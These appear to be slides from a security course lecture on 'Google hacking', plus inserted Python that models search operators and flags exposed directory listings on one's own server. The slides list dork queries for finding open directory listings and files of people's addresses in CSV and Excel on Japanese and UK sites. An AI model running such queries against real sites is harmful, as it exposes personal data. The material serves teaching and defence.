Page 71: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its standard options
– phonebook: …. search telephone number

phonebook: John Doe CA
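
The operator semantics from the slides above, as an added example (not part of the original lecture): a small Python matcher that evaluates such queries against a constructed inventory of your own site's pages, so an administrator can see which pages a given query would surface. The page records, the `example.com` hosts and the treatment of `.` in `intitle:` as a word separator are assumptions; `phonebook:` is not modelled.

```python
import re
import shlex
from urllib.parse import urlparse

# Constructed inventory of pages from a crawl of one's own site (sample data).
PAGES = [
    {"url": "http://www.example.com/news/arrest.html",
     "title": "Hacker arrested", "text": "He is a famous hacker from Ohio."},
    {"url": "http://www.example.com/files/",
     "title": "Index of /files", "text": "Name Last modified Size Parent Directory"},
    {"url": "http://intra.example.com/docs/intro.ppt",
     "title": "Course slides", "text": "Ethical hacking basics"},
]

def phrase_re(phrase):
    """Phrase -> regex over whole words; '*' stands for any one word."""
    words = [r"\w+" if w == "*" else re.escape(w) for w in phrase.split()]
    return re.compile(r"\b" + r"\W+".join(words) + r"\b", re.IGNORECASE)

def term_hits(term, page):
    """True if one query term (operator:argument or plain phrase) matches."""
    url = urlparse(page["url"])
    host = url.hostname or ""
    op, sep, arg = term.partition(":")
    op = op.lower() if sep else ""
    if op == "site":      # exact host or any sub-domain of it
        return host == arg.lower() or host.endswith("." + arg.lower())
    if op == "inurl":
        return arg.lower() in page["url"].lower()
    if op == "filetype":
        return url.path.lower().endswith("." + arg.lower())
    if op == "intitle":   # assumption: '.' in the argument separates words
        return bool(phrase_re(arg.replace(".", " ")).search(page["title"]))
    if op == "intext":
        return bool(phrase_re(arg).search(page["text"]))
    return bool(phrase_re(term).search(page["title"] + " " + page["text"]))

def search(query, pages=PAGES):
    """URLs of pages satisfying every term; a leading '-' excludes a term."""
    # The slides use curly quotes; normalise them before tokenising.
    terms = shlex.split(query.replace("“", '"').replace("”", '"'))
    def keep(page):
        return all(term_hits(t.lstrip("-"), page) != t.startswith("-") for t in terms)
    return [p["url"] for p in pages if keep(p)]
```
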


Page 72: KSK Class1 - Overview and Google Hacking

More on Google hacking

Searching the inside of a site (the parts that are actually not meant to be open to the public)

Finding server directory listings

Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.

Most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be

intitle:index.of

which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:

Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources

Page 73: KSK Class1 - Overview and Google Hacking

More on Google hacking

Combining Google options in queries

Several alternate queries that provide more accurate results:

intitle:index.of "parent directory"
intitle:index.of name size

These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.
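
The false-positive problem and the keyword refinement described above, as an added example (not from the original slides): a Python check a site owner can run over crawled pages of their own server to separate real auto-generated listings from pages that merely have "index of" in the title. The sample HTML, the paths and the three-keyword threshold are assumptions.

```python
import re
from html.parser import HTMLParser

# Column headers and link text the slides name as typical of directory listings.
LISTING_WORDS = ("parent directory", "name", "last modified", "size", "description")

class PageText(HTMLParser):
    """Collects the <title> text and the visible text of one HTML page."""
    def __init__(self):
        super().__init__()
        self.title, self.body, self._in_title = "", [], False
    def handle_starttag(self, tag, attrs):
        self._in_title = self._in_title or tag == "title"
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data
        else:
            self.body.append(data)

def classify(html):
    """Return 'listing', 'title-only' (a false positive) or 'no'."""
    page = PageText()
    page.feed(html)
    if not re.search(r"\bindex\W+of\b", page.title, re.IGNORECASE):
        return "no"
    body = " ".join(page.body).lower()
    found = [w for w in LISTING_WORDS if re.search(r"\b" + w + r"\b", body)]
    return "listing" if "parent directory" in found and len(found) >= 3 else "title-only"

# Constructed sample pages: an Apache-style listing, an ordinary page, a home page.
SAMPLES = {
    "/backup/": "<html><head><title>Index of /backup</title></head><body>"
                "<h1>Index of /backup</h1><pre>Name Last modified Size Description<hr>"
                '<a href="/">Parent Directory</a>\n'
                '<a href="bbs.dat">bbs.dat</a> 12-Mar-2009 10:02 4.1K</pre></body></html>',
    "/links.html": "<html><head><title>Index of Native American Resources on the "
                   "Internet</title></head><body><p>Each entry gives the name and "
                   "address of a site.</p></body></html>",
    "/": "<html><head><title>Welcome</title></head><body>Hello</body></html>",
}

def exposed_listings(pages):
    """Paths of pages that look like auto-generated directory listings."""
    return sorted(path for path, html in pages.items() if classify(html) == "listing")
```

Paths reported by `exposed_listings` are candidates for turning off automatic indexing on the web server (on Apache, `Options -Indexes`).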

Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
bbs.dat inurl:"Index of" intitle:"Index of"

Page 74: KSK Class1 - Overview and Google Hacking

More on Google hacking

Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"

Page 75: KSK Class1 - Overview and Google Hacking

More on Google hacking

Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs

Page 76: KSK Class1 - Overview and Google Hacking

More on Google hacking

Example:
bbs.dat inurl:"Index of" intitle:"Index of"

Page 77: KSK Class1 - Overview and Google Hacking

More on Google hacking

Example: searching for databases of people's addresses written in CSV, focusing on Japanese sites

filetype:csv address site:jp

Page 78: KSK Class1 - Overview and Google Hacking

More on Google hacking

Example: searching for databases of people's addresses written in Excel, focusing on UK sites

filetype:xls address site:uk

Page 79: KSK Class1 - Overview and Google Hacking
